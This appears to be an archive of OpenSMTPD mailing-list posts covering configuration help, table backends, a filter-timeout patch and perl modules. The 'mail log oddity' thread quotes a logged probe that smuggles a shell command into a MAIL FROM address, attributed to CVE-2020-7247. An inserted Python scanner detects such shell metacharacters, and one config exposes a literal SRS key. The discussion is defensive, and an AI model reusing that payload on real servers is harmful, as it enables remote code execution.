Re: mails not sent when using alias as recipient

2021-01-17 Thread Edgar Pettijohn
On Sun, Jan 17, 2021 at 06:33:29PM +0100, Yvan Masson wrote:
> Hi list,
> 
> I have two Debian servers that need to be able to send notification emails
> via a relay. Their configuration is identical, but only the first works
> properly. On the second, sending to aliases does not work:
> 
> 
> $ echo foo | mail -s test y...@masson-informatique.fr
> -> works
> 
> $ echo foo | mail -s test root
> mail: cannot send message: Process exited with a non-zero status
> -> does not work :-(
> 
> 
> Unfortunately after two hours digging I still can't find where the issue
> lies... Any pointer would be greatly appreciated!
> 
> Best regards,
> Yvan
> 
> 
> # smtpd -d -T lookup
> 82908be87cc7fef7 smtp event=connected address=local host=debian
> lookup: check "local" as NETADDR in table static: -> found
> lookup: check "server.foo.fr" as DOMAIN in table static: -> 0
> lookup: check "local" as NETADDR in table static: -> found
> lookup: check "server.foo.fr" as DOMAIN in table static: -> 0
> 82908be87cc7fef7 smtp event=failed-command address=local host=debian
> command="RCPT TO: " result="550 Invalid recipient"
> 
> 82908be87cc7fef7 smtp event=closed address=local host=debian
> reason=disconnect
> 
> 
> $ cat /etc/smtpd.conf
> listen on localhost
> # If you edit the file, you have to run "smtpctl update table aliases"
> table aliases file:/etc/aliases
> table secrets file:/etc/smtpd.secrets
> accept for local \
> alias  \
> deliver to mbox
> accept for domain masson-informatique.fr \
> relay via secure+auth://y...@mail.infomaniak.com:587 \
> auth  \
> as y...@masson-informatique.fr
> 
> 
> $ cat /etc/aliases
> root: y...@masson-informatique.fr

r...@server.foo.fr: y...@masson-informatique.fr

> 
> 
> $ cat /etc/hostname
> 127.0.0.1   localhost
> 127.0.1.1   server.foo.fr serveur
> ::1 localhost ip6-localhost ip6-loopback
> ff02::1 ip6-allnodes
> ff02::2 ip6-allrouters
> 






Re: warn: table-proc: pipe closed (Probably mySQL-hassle and a newbie-question)

2020-08-15 Thread Edgar Pettijohn
On Sun, Aug 16, 2020 at 02:15:52AM +0200, Fabian Müller wrote:
> 
> is your user allowed to connect to the host above?
> 
> ** Which host do you mean? mx01 is allowed to connect to db (ha-proxy) and 
> even db1, db2, db3 directly (which I also tried, but did not change 
> anything). And the internet is allowed to connect to mx1. Or did you mean the 
> mda1? mda1 is not yet set up.
>

The user from mysql.conf needs to be able to connect to the mysql server
found at host db.[removed for privacy].

> > username [removed for privacy]
> > password [removed for privacy]
> > database [removed for privacy]
> > 
> > query_credentials SELECT email, password FROM virtual_users WHERE email=?;
> > query_domain SELECT name FROM virtual_domains WHERE name=?;
> > query_userinfo SELECT uid,gid,maildir FROM virtual_users WHERE email=?;
> > query_alias SELECT destination FROM virtual_aliases WHERE source=?;
> 
> # Further explanations: What I've tried
> First I guess the error has something to do with the mysql-stuff.
> 
> But I am really really confused about the whole mysql-tables thing and can't 
> find a place where actually somebody explained (or documented) how it works.
> 
> Have you tried:
> 
> man table-mysql
> 
> Perhaps it's missing, if so you can find it on github.
> 
> ** I found the source for a man that sheds light on what those config options 
> are for. 
> 
> But that actually doesn't help me with the error which occurs or if they 
> are needed.
> 
> By taking a look at table_proc.c from the opensmtpd source on github I guess 
> 
> > warn: table-proc: pipe closed
> 
> means that opensmtpd got an empty response when trying to do something (?) 
> with a table. I am unsure what opensmtpd is trying to do with the table. 
> Strangely it isn't even trying to connect to the db-server (tcpdump 
> unrevals that). 
>

table-proc is a separate process if I'm not mistaken that needs to talk
to the table-mysql which is a separate process. If the pipe is closed
they can't talk to each other.

> So what we know: It has something to do with the mysql-tables. What I don't 
> understand is, what opensmtpd is trying to do which leads to that error. To 
> my understanding opensmtpd should only try to connect to the database if it 
> needs to read from the tables, which - if just starting up - obviously is 
> not the case. 
> 
>

If you try something like:

# smtpd -dv

You should get some useful messages from table-mysql if it's not
connecting or what have you.

Edgar



Re: warn: table-proc: pipe closed (Probably mySQL-hassle and a newbie-question)

2020-08-15 Thread Edgar Pettijohn
On Sun, Aug 16, 2020 at 12:13:41AM +0200, Fabian Müller wrote:
> Hi!
> 
> I am hopefully a new opensmtpd user and before I'll start off with my first 
> newbie question I'd be happy to briefly introduce myself: I'm Fabian from 
> Germany. Actually I am studying German law, but as - in opposite to legal 
> work - anyone who wants to can "do" IT-stuff I've also been in IT 
> since I left school. Together with some friends I own a small IT-company 
> which makes me here and there a few bucks but is actually there more for the 
> fun rather than the profit. During school-time I've already run a mailserver 
> (postfix + dovecot, but that actually doesn't mean I've known anything 
> about mail ;)) but after we started offering services to businesses we 
> somehow switched over to an all in one solution (plesk).
> 
> As those AiO-solutions suck because they are a blackbox and debugging is a 
> nightmare we've decided to do hosting ourselves again. And as I am the only one 
> of us who is motivated to dive into mail, it became my part. So after some 
> days googling around and spending a serious amount of time on youtube 
> watching mail-server-congress-talks I decided to go with a setup including 
> opensmtpd rather than postfix. As the best way to start with something is to 
> start trying I spun up a few cloud-servers and started trying. As expected I 
> ran into problems but - not expected - reading the man and googling 
> around couldn't solve them.
> 
> So that's how I ended up here, hoping for your help!
> 
> # General Setup
> 1. OpenSMTPD (tables via mysql, delivering via lmtp)
> 2. Dovecot (not yet set up)
> 3. MariaDB Galera Cluster as Backend-Database
> 
> # The Problem
> I'm getting the following error and can't connect to port 25 from outside 
> world (telnet port 25).

Are you sure your ISP isn't blocking you? Can you connect to a non
standard port or the submission port from outside?

listen on egress port 5000

telnet yourhost.com 5000

> 
> > Aug 15 23:17:25 mx01 smtpd[32458]: info: OpenSMTPD 6.0.3-portable starting
> > Aug 15 23:17:25 mx01 smtpd[32462]: warn: table-proc: pipe closed
> > Aug 15 23:17:25 mx01 smtpd[32462]: lookup: table-proc: exiting
> > Aug 15 23:17:25 mx01 smtpd[32459]: smtpd: process lka socket closed 
> 

Is mysqld up and running? Have you verified from the command line that
your username and password are correct?

mysql --user=username --password=password dbase

> # Host-System
> OS: Debian 10
> OpenSMTPd: 6.0.3p1-5+deb10u4
> Opensmtpd-extras: 5.7.1-4+b2
> 
> # /etc/smtpd.conf
> > # Set variables
> > ipv4addr = [removed for privacy]
> > hostn = mx01.[removed for privacy]
> >
> > # compresses the queue, encrypts it and deletes after 4 hours (optional)
> > #queue compression
> > #queue encryption key "[removed for privacy]"
> > #expire 4h
> >
> > # Add certificates
> > pki mx01.[removed for privacy] certificate "/etc/ssl/mx01.[removed for 
> > privacy].crt"
> > pki mx01.[removed for privacy] key "/etc/ssl/private/mx01.[removed for 
> > privacy].key"
> > 
> > # Load relevant tables
> > table domains mysql:/etc/mail/mysql.conf
> > table credentials mysql:/etc/mail/mysql.conf
> > 
> > # Listen
> > listen on $ipv4addr port smtp tls
> > listen on $ipv4addr smtps pki mx01.mx.itsmind.dev auth 
> > listen on $ipv4addr port submission tls-require pki mx01.mx.itsmind.dev 
> > auth 
> > 
> > # Accept and forward e-mails
> > accept from any for domain  deliver to lmtp "mda1:24"
> > accept for any relay
> 
> # /etc/mail/mysql.conf
> > host db.[removed for privacy]

is your user allowed to connect to the host above?

> > username [removed for privacy]
> > password [removed for privacy]
> > database [removed for privacy]
> > 
> > query_credentials SELECT email, password FROM virtual_users WHERE email=?;
> > query_domain SELECT name FROM virtual_domains WHERE name=?;
> > query_userinfo SELECT uid,gid,maildir FROM virtual_users WHERE email=?;
> > query_alias SELECT destination FROM virtual_aliases WHERE source=?;
> 
> # Further explanations: What I've tried
> First I guess the error has something to do with the mysql-stuff.
> 
> But I am really really confused about the whole mysql-tables thing and can't 
> find a place where actually somebody explained (or documented) how it works.

Have you tried:

man table-mysql

Perhaps it's missing, if so you can find it on github.

> 
> In the beginning I thought it works like if I write 
> 
> > table domains mysql:/etc/mail/mysql.conf
> 
> to the smtpd.conf the value domains is retrieved from what's stated after
> 
> query_domains  (query_domains because the name of the table is domains. So 
> from my guess table example would translate to query_example).
> 
> Therefore I only had one line 
> 
> query_domain SELECT name FROM virtual_domains WHERE name=?;
> 
> in my mysql.conf. I've also tried using $1 instead of ?. After every conf I 
> found in the internet (about 3) had 

Re: Is LDAP+SSL supported?

2020-07-25 Thread Edgar Pettijohn
On Sat, Jul 25, 2020 at 02:26:27PM +0200, Éloi Rivard wrote:
> > In my opinion, table-ldap from extras is doomed as it relies on a lib
> > that
> > is barely maintained and doing LDAP asynchronously is painful. 
> 
> Are you saying the support for table-ldap may stop in a near future?
> 
> > I doubt the
> > code will go much further than it currently does.
> However, would you still accept patches for ldaps support?
> 
> > If the table-procexec work I documented on my blog gets pushed to
> > OpenBSD,
> > then it will ease the writing of a table-ldap with a modern library.
> I will keep an eye on this then.

I think the plan is to move to the table-procexec. Similar to the
filters and you would be able to write an ldap backend in any language.

Edgar



Re: Help to adapt "Setting up a mail server with OpenSMTPD, Dovecot and Rspamd"

2020-07-19 Thread Edgar Pettijohn
table-passwd can be found here:

https://github.com/OpenSMTPD/OpenSMTPD-extras

On Mon, Jul 13, 2020 at 05:23:20PM -0300, Leandro Peracchi wrote:
> Scenario: hypno.cat expanded inside a Raspberry Pi 4 with Arch Linux, three
> breeds (domains), two virtual users and one local user.
> 
> 
> - Raspberry Pi 4 Model B Rev 1.2 with 4 GB RAM and 64 GB SD Card
> 
> - Arch Linux ARM armv7l with kernel 5.4.50-1-ARCH
> 
> - OpenSMTPD 6.7.1p1-4, Dovecot 2.3.10.1-1 and Rspamd 2.5-2
> 
> - three domains [ birman.com persian.com siamese.com ]
> 
> - same two virtual users on each domain [ daddy mommy ]
> 
> - one ip address [ a.b.c.d ]
> 
> - one local user [ user ]
> 
> 
> DNS records:
> 
> 
> birman.com A a.b.c.d
> 
> birman.com MX 10 mail.birman.com
> 
> birman.com TXT "v=spf1 mx -all"
> 
> _dmarc birman.com TXT "v=DMARC1;p=none;pct=100;rua=mailto:postmaster@
> birman.com;"
> 
> 20200713._domainkey birman.com TXT "v=DKIM1;k=rsa;p=MIG...QAB;"
> 
> mail birman.com A a.b.c.d
> 
> 
> * same for persian.com and siamese.com with respective changes in domain
> name
> 
> 
> Created a local user to manage the six virtual mailboxes.
> 
> 
> $ sudo useradd -m -c "Virtual Mail" -d /var/mail/vmail -s /sbin/nologin
> vmail
> 
> 
> I got the certificates with LetsEncrypt.
> 
> 
> $ sudo certbot --nginx --agree-tos --no-eff-email --redirect --hsts
> --staple-ocsp --email personal.em...@gmail.com -d mail.birman.com
> 
> 
> Generate keys for DKIM.
> 
> 
> $ sudo mkdir /etc/smtpd/dkim
> 
> $ sudo openssl genrsa -out /etc/smtpd/dkim/birman.com.key 1024
> 
> $ sudo openssl rsa -in /etc/smtpd/dkim/birman.com.key -pubout \
> 
> -out /etc/smtpd/dkim/birman.com.pub
> 
> $ sudo chown -R rspamd:rspamd /etc/smtpd/dkim
> 
> 
> * same for persian.com and siamese.com with respective changes in domain
> name
> 
> 
> In this learning setup will exist six virtual mailboxes and three email
> addresses delivering to the local user "user" (u...@birman.com,
> u...@persian.com and u...@siamese.com).
> 
> 
> Under /home/user/Maildir will be mail sent for u...@birman.com,
> u...@persian.com and u...@siamese.com.
> 
> 
> At /var/mail/vmail will exist three directories (birman.com, persian.com
> and siamese.com) and below each of these directories will exist two
> directories (daddy and mommy) which in turn will have the Maildir directory
> to store mail.
> 
> 
> Also I would like OpenSMTPD to use the respective domain/certificate when
> receiving or sending mail (based on the domain of the user receiving or
> sending).
> 
> 
> I can get all "parts" ready to work but cannot create the appropriate files
> to OpenSMTPD and Dovecot make this scenario work.
> 
> 
> If this scenario is possible and someone with more knowledge could provide
> the configuration for smtpd.conf and dovecot.conf I would be grateful.
> 
> 
> It has been two weeks trying to understand/consolidate several pieces of
> information from the Internet without success. Also I find other problems
> on the way. First I tried with Manjaro ARM (64-bit). Could not get rspamd
> to start. Then I tried Ubuntu 20.04. Some packages aren't available. Tried
> to put OpenBSD or FreeBSD on Raspberry, can't either. Get all "parts" ready
> on Arch Linux. I'm learning a lot, but some help now would be great!
> 
> 
> Thanks!



Re: Help to adapt "Setting up a mail server with OpenSMTPD, Dovecot and Rspamd"

2020-07-14 Thread Edgar Pettijohn
On Tue, Jul 14, 2020 at 10:10:23PM -0300, Leandro Peracchi wrote:
> I made some progress, all services start without errors.
> 
> When tried to send a test mail from Gmail to my server, got the error:
> 
> smtpd[727]: ny express[727]: c2a5ef6f793addab mda delivery
> evpid=567ebdf9f826cf44
>   from= to= rcpt=
> user=vmail
>   delay=4m10s result=TempFail stat=Error
>   (temporary failure: "mail.lmtp: LMTP server error: 550 5.1.1 <
> mo...@birman.com> User doesn't exist: mo...@birman.com")
> 
> Below are my conf files
> 
> 
> /etc/smtpd/smtpd.conf
> =
> pki mail.birman.com cert "/etc/letsencrypt/live/
> mail.birman.com/fullchain.pem"
> pki mail.birman.com key  "/etc/letsencrypt/live/mail.birman.com/privkey.pem"
> 
> #pki mail.persian.com cert "/etc/letsencrypt/live/
> mail.persian.com/fullchain.pem"
> #pki mail.persian.com key  "/etc/letsencrypt/live/
> mail.persian.com/privkey.pem"
> 
> srs key "j1wFzMlJEb1w81mqWC1NpKRsMJBzeKavii+ALQ8W"
> #srs key backup ""
> 
> filter check_dyndns phase connect match rdns regex { '.*\.dyn\..*',
> '.*\.dsl\..*' } \
>   disconnect "550 no residential connections"
> 
> filter check_rdns phase connect match !rdns \
>   disconnect "550 no rDNS is so 80s"
> 
> filter check_fcrdns phase connect match !fcrdns \
>   disconnect "550 no FCrDNS is so 80s"
> 
> filter senderscore \
>   proc-exec "filter-senderscore -blockBelow 10 -junkBelow 70 -slowFactor
> 5000"
> 
> filter rspamd proc-exec "filter-rspamd"
> 
> table aliases  file:/etc/smtpd/aliases
> table domains  file:/etc/smtpd/domains
> table passwds  file:/etc/smtpd/passwds

See note below about passwd-file.

> table virtuals file:/etc/smtpd/virtuals
> 
> listen on 0.0.0.0 tls pki mail.birman.com \
>   filter { check_dyndns, check_rdns, check_fcrdns, senderscore, rspamd }
> 
> listen on 0.0.0.0 port submission mask-src tls-require pki mail.birman.com
> auth  \
>   filter rspamd
> 
> action "RECV" lmtp "/var/run/dovecot/lmtp" rcpt-to virtual 
> match from any for domain  action "RECV"
> 
> action "SEND" relay srs helo mail.birman.com
> match from any auth for any action "SEND"
> 
> 
> /etc/smtpd/aliases
> ==
> vmail:  /dev/null
> 
> root:   user
> user:   da...@birman.com
> 
> 
> /etc/smtpd/domains
> ==
> birman.com
> persian.com
> siamese.com
> 
> 
> /etc/smtpd/mailname
> ===
> mail.birman.com
> 
> 

If you are trying to use passwd-file format you need to install the
passwd backend.

> /etc/smtpd/passwds
> ==
> da...@birman.com:$6$...::
> mo...@birman.com:$6$...::
> da...@persian.com:$6$...::
> mo...@persian.com:$6$...::
> da...@siamese.com:$6$...::
> mo...@siamese.com:$6$...::
> 
> 
> /etc/smtpd/virtuals
> ===
> da...@birman.com   vmail
> mo...@birman.com   vmail
> 
> da...@persian.com   vmail
> mo...@persian.com   vmail
> 
> da...@siamese.com   vmail
> mo...@siamese.com   vmail
> 
> 
> /etc/dovecot/dovecot.conf
> =
> listen = 0.0.0.0
> 
> ssl = required
> ssl_cert =  ssl_key  =  
> ssl_min_protocol = TLSv1.2
> ssl_prefer_server_ciphers = yes
> 
> disable_plaintext_auth = yes
> 
> protocols = lmtp imap
> 
> service lmtp {
> unix_listener lmtp {
> user  = vmail
> group = vmail
> }
> }
> 
> service imap-login {
> inet_listener imaps {
> port = 993
> }
> }
> 
> passdb {
> driver = passwd-file
> args = scheme=SHA512-CRYPT username_format=%n /etc/dovecot/users
> }
>

username_format=%u

Since your database has the full username. Or you can probably just omit
it.

> userdb {
> driver = passwd-file
> args = username_format=%n /etc/dovecot/users
> override_fields = uid=vmail gid=vmail home=/var/mail/vmail/%d/%n
> }
> 
> mail_location = maildir:~/Maildir
> 
> 
> /etc/dovecot/users
> ==
> da...@birman.com:{SHA512-CRYPT}$6$...
> mo...@birman.com:{SHA512-CRYPT}$6$...

Good luck,

Edgar



Re: mail log oddity

2020-06-11 Thread Edgar Pettijohn
On Thu, Jun 11, 2020 at 04:26:37PM -0700, Niklas wrote:
> I'm curious what this would actually accomplish on a vulnerable server.
> 
> There's no path or executable its trying to find in its iterations. This 
> looks more like an arbitrary shell command meant to act as a scan/test to 
> find vulnerable servers without fully leveraging the exploit.
> 
> If you had the IP it originates from it could tell you a lot.
> On Jun 10, 2020 8:08 PM, Ryan Kavanagh wrote:

61.148.74.134

Edgar

> >
> > On Wed, Jun 10, 2020 at 10:00:08PM -0500, Edgar Pettijohn wrote: 
> > > Saw this in the maillog today. Any ideas what they are trying to do? 
> > > 
> > >  249c054a86af9328 smtp failed-command command="MAIL FROM: <;for i in 0 1 
> > >2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>" result="530 5.5.1 
> > >Invalid command: Must issue an AUTH command first" 
> >
> > My guess is that they're trying to exploit CVE-2020-7247. Search the 
> > advisory text for that command: 
> >
> > https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt 
> >
> > Best, 
> > Ryan 
> >



mail log oddity

2020-06-10 Thread Edgar Pettijohn
Saw this in the maillog today. Any ideas what they are trying to do?

 249c054a86af9328 smtp failed-command command="MAIL FROM: <;for i in 0 1 2 3 4 
5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>" result="530 5.5.1 Invalid 
command: Must issue an AUTH command first"

Edgar
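
The probe quoted in this thread can be found mechanically in a maillog. As an added example (not part of the original posts), this Python scanner reads OpenSMTPD failed-command lines in both layouts that appear on this page and flags MAIL FROM / RCPT TO addresses containing shell metacharacters. The sample lines, the syslog prefix, the example.org addresses and the metacharacter set are constructed assumptions.

```python
import re

# Both layouts seen on this page:
#   "<sid> smtp failed-command command=... result=..."            (older)
#   "<sid> smtp event=failed-command address=... command=..."     (newer)
FAILED_CMD = re.compile(
    r'(?P<sid>[0-9a-f]{16}) smtp (?:event=)?failed-command\b.*?'
    r'command="(?P<command>.*?)" result="(?P<result>.*?)"\s*$'
)
ENVELOPE = re.compile(r'(MAIL FROM|RCPT TO):\s*<(.*)>', re.IGNORECASE)

# Assumption: a heuristic set. RFC 5321 allows a few of these in a local
# part, so a hit is a lead for review, not proof of an attack.
SHELL_META = set(';|&$`()<> \t')


def parse_failed_command(line):
    """Return sid/command/result for a failed-command line, else None."""
    m = FAILED_CMD.search(line)
    if m is None:
        return None
    return m.groupdict()


def suspicious_chars(address):
    """Sorted list of shell metacharacters present in an envelope address."""
    return sorted(set(address) & SHELL_META)


def scan(lines):
    """Flag failed MAIL FROM / RCPT TO commands whose address looks like shell."""
    findings = []
    for line in lines:
        rec = parse_failed_command(line)
        if rec is None:
            continue
        env = ENVELOPE.match(rec["command"])
        if env is None:
            continue  # some other SMTP verb failed
        chars = suspicious_chars(env.group(2))
        if chars:
            findings.append({
                "sid": rec["sid"],
                "verb": env.group(1).upper(),
                "address": env.group(2),
                "metachars": chars,
                "result": rec["result"],
                # 4xx/5xx reply: the server refused this command
                "rejected": rec["result"][:1] in ("4", "5"),
            })
    return findings


# Constructed sample: the first entry is the line from this thread, unwrapped,
# with an invented syslog prefix; the others are benign lines for contrast.
SAMPLE_LOG = [
    'Jun 10 21:57:03 mail smtpd[4242]: 249c054a86af9328 smtp failed-command '
    'command="MAIL FROM: <;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;'
    'done;sh;exit 0;>" result="530 5.5.1 Invalid command: Must issue an AUTH '
    'command first"',
    '82908be87cc7fef7 smtp event=failed-command address=local host=debian '
    'command="RCPT TO: <root@example.org>" result="550 Invalid recipient"',
    '82908be87cc7fef7 smtp event=connected address=local host=debian',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["sid"], f["verb"], f["metachars"], "rejected:", f["rejected"])
```

A hit with "rejected" set only shows that this command was refused; it says nothing about whether the server version is affected by the CVE named in the reply.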



Re: Newbie config question

2020-06-05 Thread Edgar Pettijohn
On Fri, Jun 05, 2020 at 11:28:12AM -0500, David Favor wrote:
> I've been wrestling with this for days with no progress.
> 
> Can someone drop me a v6.6.4 config to do something similar to the following.
> 
>da...@davidfavor.com   - maildir
>i...@davidfavor.com- forward to da...@davidfavor.com
>supp...@davidfavor.com - forward to f...@helpdesk.com using MailGun Relay 
> Service
> 
>supp...@radicalhealth.com - maildir
>i...@radicalhealth.com- forward to supp...@radicalhealth.com
>da...@radicalhealth.com   - send natively to da...@davidfavor.com (no 
> Smarthost or Relay Service)
> 
> Just a raw config file will be fine, I can remove
> whatever I don't require right now, like DKIM signing,
> which I'll add later.
>

It would likely be easier if you just posted your current smtpd.conf and
associated tables. 

Edgar

> I'm just trying to get basic OpenSMTPD delivery working.
> 
> Thanks.



Re: new table backends

2020-05-26 Thread Edgar Pettijohn
On Tue, May 26, 2020 at 10:58:12PM +, gil...@poolp.org wrote:
> Hellow,
> 
> I have been working on a new table backend: table-procexec.
> 
> What it does is translate the imsg table API to a line-based protocol that is
> very similar to what we did for filters. A table backend can become a program
> consuming table requests from stdin and responding to stdout:
> 
> stdin : table
> 
> 
> The idea behind this is to unlock table backend development to people who are
> not necessarily C developers and who could still write useful implementations
> in other languages. Like with filters, this makes it possible to use anything
> from awk to shell, Go, Python and what not without OpenSMTPD caring about how
> these backends are implemented.
> 
> I have written a Golang package to abstract the protocol details and that let
> you write a backend by implementing the four basic operations of table API. A
> sample table-example.go is available here to see how a backend looks like:
> 
> https://gist.github.com/poolpOrg/b3b97a65791a11a49f5e76ea51331ae4
> 
> 
> If people are willing to help implement some backends, hit me up
> 
> Cheers,
> Gilles

Sweet. Looking at 
https://github.com/poolpOrg/go-opensmtpd/blob/master/table/table.go 
seems like it will be pretty simple to write some nice tables.

Thanks!



[patch] add a timeout to filter registration

2020-05-02 Thread Edgar Pettijohn
When playing with filters it's easy to forget to register
stdout, etc...

Here is a patch to add a timeout and give a little helpful info as
opposed to just hanging in an unusable state.
Index: lka_filter.c
===
RCS file: /cvs/src/usr.sbin/smtpd/lka_filter.c,v
retrieving revision 1.62
diff -u -p -u -r1.62 lka_filter.c
--- lka_filter.c24 Apr 2020 11:34:07 -  1.62
+++ lka_filter.c2 May 2020 15:37:56 -
@@ -66,6 +66,7 @@ static void   filter_result_disconnect(uin
 static voidfilter_session_io(struct io *, int, void *);
 void   lka_filter_process_response(const char *, const char *);
 
+static voidlka_proc_timeout(int, short, void *);
 
 struct filter_session {
uint64_tid;
@@ -180,6 +181,7 @@ struct processor_instance {
char*name;
struct io   *io;
struct io   *errfd;
+   struct event tmo;
int  ready;
uint32_t subsystems;
 };
@@ -213,10 +215,13 @@ lka_proc_config(struct processor_instanc
io_printf(pi->io, "config
 }
 
+#define TIMEOUT 10
+
 void
 lka_proc_forked(const char *name, uint32_t subsystems, int fd)
 {
struct processor_instance   *processor;
+   struct timeval timeout = { TIMEOUT, 0 };
 
if (!processors_inited) {
dict_init();
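Review bot: "#define TIMEOUT 10" is a very generic file-scope name and carries no unit; from "struct timeval timeout = { TIMEOUT, 0 }" it is seconds. Suggest a name tied to its purpose (for example PROC_REGISTER_TIMEOUT) and a one-line comment stating the unit, so the value is not mistaken for some other timeout in lka_filter.c.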
@@ -232,6 +237,10 @@ lka_proc_forked(const char *name, uint32
 
io_set_fd(processor->io, fd);
io_set_callback(processor->io, processor_io, processor->name);
+
+   evtimer_set(>tmo, lka_proc_timeout, processor);
+   evtimer_add(>tmo, );
+
dict_xset(, name, processor);
 }
 
@@ -269,6 +278,7 @@ processor_register(const char *name, con
processor = dict_xget(, name);
 
if (strcmp(line, "register
+   evtimer_del(>tmo);
processor->ready = 1;
return;
}
@@ -1741,4 +1751,12 @@ lka_report_proc(const char *name, const 
sp = ep + 1;
 
lka_report_filter_report(reqid, name, 0, direction, , sp);
+}
+
+static void
+lka_proc_timeout(int fd, short events, void *arg)
+{
+   struct processor_instance *processor = arg;
+
+   fatalx("%s: failed to register", processor->name);
 }
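Review bot: the message in lka_proc_timeout(), "%s: failed to register", does not say that a timer fired or how long was waited, and fatalx() terminates the process for a filter that is merely slow to start. Suggest including the TIMEOUT value in the text (for example "%s: did not register within %d seconds") so the log line explains why smtpd stopped.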


Re: Custom filter

2020-04-16 Thread Edgar Pettijohn
On Thu, Apr 16, 2020 at 06:14:46PM +0200, Martijn van Duren wrote:
> On 4/16/20 3:58 PM, Jacky wrote:
> > Hi,
> > 
> > I am using Opensmtp 6.6.4p1. I am going to use Opensmtp as outgoing SMTP 
> > server, and use POP before SMTP method for authentication.
> > 
> > Is it possible for us to write and use custom filter ? If yes, is there any 
> > information / resources available in the web ?
> > 
> > Jacky
> > 
> 

You can get the manual here:
https://raw.githubusercontent.com/OpenSMTPD/OpenSMTPD/portable/smtpd/smtpd-filters.7

I don't believe it is 100% but still a good starting point.

Edgar

> There are a couple of filters available, but I'm not aware of how
> cross-platform available they are.
> From the OpenBSD ports tree there's the following written in go:
> - https://github.com/poolpOrg/filter-rspamd
> - https://github.com/poolpOrg/filter-senderscore
> - spamassassin via https://www.umaxx.net
> The latter has a couple of other filters, but aren't in the ports
> tree, so probably have a little less testing.
> 
> I have written filter-dnsbl and filter-dkimsign in C:
> - http://imperialat.at/dev/libopensmtpd/ (dependency for both)
> - http://imperialat.at/dev/filter-dnsbl/
> - http://imperialat.at/dev/filter-dkimsign/
> 
> I've got libopensmtpd to compile on Linux, but after that my need to get
> them to work on Linux disappeared so the filters themselves never got 
> there. If you want to use them I'm willing to help you set them up in 
> your environment and commit the changes to my repo.
> 
> Other filters are relatively easy to write, but I don't think the
> protocol is properly documented. You can look at this thread[0] as a
> starting point, but there have been some minor changes since then, so
> make sure to check your input.
> 
> martijn@
> 
> [0] https://www.mail-archive.com/misc@opensmtpd.org/msg03727.html



filter-spamassassin.pl

2020-04-01 Thread Edgar Pettijohn

http://www.pettijohn-web.com/filter-spamassassin.pl

http://www.pettijohn-web.com/SHA512

I've written a little spamassassin filter in perl. The only requirement 
you may not have installed is AnyEvent. It's pretty common so your os 
most likely has it packaged. If not:


# cpan -i AnyEvent

Obviously you will also need the spamassassin daemon running.

I've been using it for about 3 days so far without issues, though there 
may still be bugs lurking. One is likely to be the need for a message 
size limit. Not sure what that should be though.



Edgar




OpenSMTPD::Password perl module now supports openbsd

2020-03-19 Thread Edgar Pettijohn
OpenBSD is now supported and tested on OpenBSD 6.6 stable. Install both 
modules listed below and then just 'use OpenSMTPD::Password qw/newhash 
checkhash/;' It will automatically detect the XS module and use it.


http://www.pettijohn-web.com/OpenSMTPD-Password-XS-0.01.tar.gz

http://www.pettijohn-web.com/OpenSMTPD-Password-0.03.tar.gz

http://www.pettijohn-web.com/SHA512

On 3/18/20 10:29 AM, Edgar Pettijohn wrote:
Just updated the module with a few minor tweaks, mostly just making it 
more perl like and a few more error checks. Also requires 
BSD::arc4random to provide random numbers as opposed to the perl 
builtin rand(). Should make the truly paranoid types happy :) Again it 
still only works for portable. Plan on adding openbsd support this 
weekend hopefully. If not sometime soon.


http://www.pettijohn-web.com/OpenSMTPD-Password-0.02.tar.gz

http://www.pettijohn-web.com/SHA512

I'm also working on a plack app for adding/deleting users and allowing 
users to change their passwords. It's still pretty rough, but mostly 
works. Currently it only supports sql databases. Tested with mariadb, 
but I think it's generic enough that mysql and postgres should work out 
of the box. If anyone is interested in checking it out let me know. It 
would really benefit from some html gurus attention.


Thanks,


Edgar






OpenSMTPD::Password perl module

2020-03-18 Thread Edgar Pettijohn
Just updated the module with a few minor tweaks, mostly just making it 
more perl like and a few more error checks. Also requires 
BSD::arc4random to provide random numbers as opposed to the perl builtin 
rand(). Should make the truly paranoid types happy :) Again it still 
only works for portable. Plan on adding openbsd support this weekend 
hopefully. If not sometime soon.


http://www.pettijohn-web.com/OpenSMTPD-Password-0.02.tar.gz

http://www.pettijohn-web.com/SHA512

I'm also working on a plack app for adding/deleting users and allowing 
users to change their passwords. It's still pretty rough, but mostly 
works. Currently it only supports sql databases. Tested with mariadb, 
but I think it's generic enough that mysql and postgres should work out 
of the box. If anyone is interested in checking it out let me know. It 
would really benefit from some html gurus attention.


Thanks,


Edgar




perl module for hashing/checking passwords

2020-03-11 Thread Edgar Pettijohn
Here is a simple perl module for hashing passwords/checking passwords 
for use in scripts and such. Tested on Slackware current and Netbsd 8.1 
others expected to work. Only works with portable smtpd.


Basically just a perl version of contrib/libexec/encrypt/encrypt.c

http://www.pettijohn-web.com/OpenSMTPD-Password-0.01.tar.gz


Edgar




Re: filter question

2020-03-09 Thread Edgar Pettijohn

On Mar 9, 2020 1:34 AM, Martijn van Duren  wrote:
>
> On 3/6/20 5:00 PM, epektasis wrote:
> > Greetings.  I have my own blacklist file of email addresses
> > (some in the format microcen...@microcenter.com and some in 
> > the format *@squaredeals.com), one per line.  I would like to
> > filter each incoming email so that a mail-from address
> > that matches any line in the blacklist file will go to a
> > junk file.  In the smtpd.conf I have tried
> > 
> > table blksender file:/etc/blksender
> > filter mail-from  junk
> > match filter mail-from  junk
> > 
> > but get syntax errors on both of the last two lines when
> > checking the configuration.  There's something I'm not
> > understanding and am asking for advice.
> > epektasis
> > 
> Have another look at the manpage:
>  filter filter-name phase phase-name match conditions decision
>  Register a filter filter-name.  A decision about what to do
>  with the mail is taken at phase phase-name when matching
>  conditions.  Phases, matching conditions, and decisions are
>  described in MAIL FILTERING, below.
>
> So without testing (you should do that yourself anyway) I think what you
> want would be:
>
> table blksender file:/etc/blksender
> filter blksender phase mail-from match mail-from  junk
> listen on   filter blksender
>

Also look at table(5) '*' is only allowed on the domain side of the '@'.

Edgar

perl filter/report module

2020-02-25 Thread Edgar Pettijohn
I wrote a simple perl module for easing the writing of filter/reports 
for OpenSMTPD. It isn't 100% complete, but it's usable.


http://www.pettijohn-web.com/OpenSMTPD-Report-0.01.tar.gz


Edgar





Re: Enforce outgoing mail to always use TLS

2020-02-22 Thread Edgar Pettijohn



On 02/22/20 12:55, Søren Aurehøj wrote:

Hi Misc

